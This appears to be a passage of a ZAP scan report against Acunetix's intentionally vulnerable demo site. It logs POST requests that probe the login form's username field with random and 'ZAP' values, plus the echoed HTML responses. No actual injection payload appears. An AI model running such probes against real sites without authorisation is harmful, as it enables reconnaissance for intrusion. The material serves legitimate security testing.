value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM/uCBtd+n7UP" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top" align="center"> <TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm"> <TR> <TD>Username:</TD> <TD align="right"> <input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD align="right"> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" /> Remember me </TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/login.aspx
Method	POST
Parameter	tbUsername
Attack
Evidence
Show / hide Request and Response
Request Header - size: 577 bytes.	POST http://testaspnet.vulnweb.com/login.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1144 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/login.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,144 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv%2BQ8XadeewSqHhJbH9z4dvJw%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWWwLoz%2FfGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM%2FuCBtd%2Bn7UP&tbUsername=YMEgZXeH&tbPassword=&btnLogin=Login
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:35 GMT Content-Length: 13420
Response Body - size: 13,420 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>login</title> <meta name="vs_showGrid" content="True"> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="frmLogin" method="post" action="login.aspx" id="frmLogin"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['frmLogin']; if (!theForm) { theForm = document.frmLogin; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM/uCBtd+n7UP" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top" align="center"> <TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm"> <TR> <TD>Username:</TD> <TD align="right"> <input name="tbUsername" type="text" value="YMEgZXeH" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD align="right"> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" class="classic" /> Remember me </TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/login.aspx
Method	POST
Parameter	tbUsername
Attack
Evidence
Show / hide Request and Response
Request Header - size: 405 bytes.	POST http://testaspnet.vulnweb.com/login.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/login.aspx Content-Length: 1161 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 1,161 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv%2BQ8XadeewSqHhJbH9z4dvJw%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWWwLoz%2FfGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM%2FuCBtd%2Bn7UP&tbUsername=ZAP&tbPassword=ZAP&cbPersistCookie=on&btnLogin=Login
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 13433
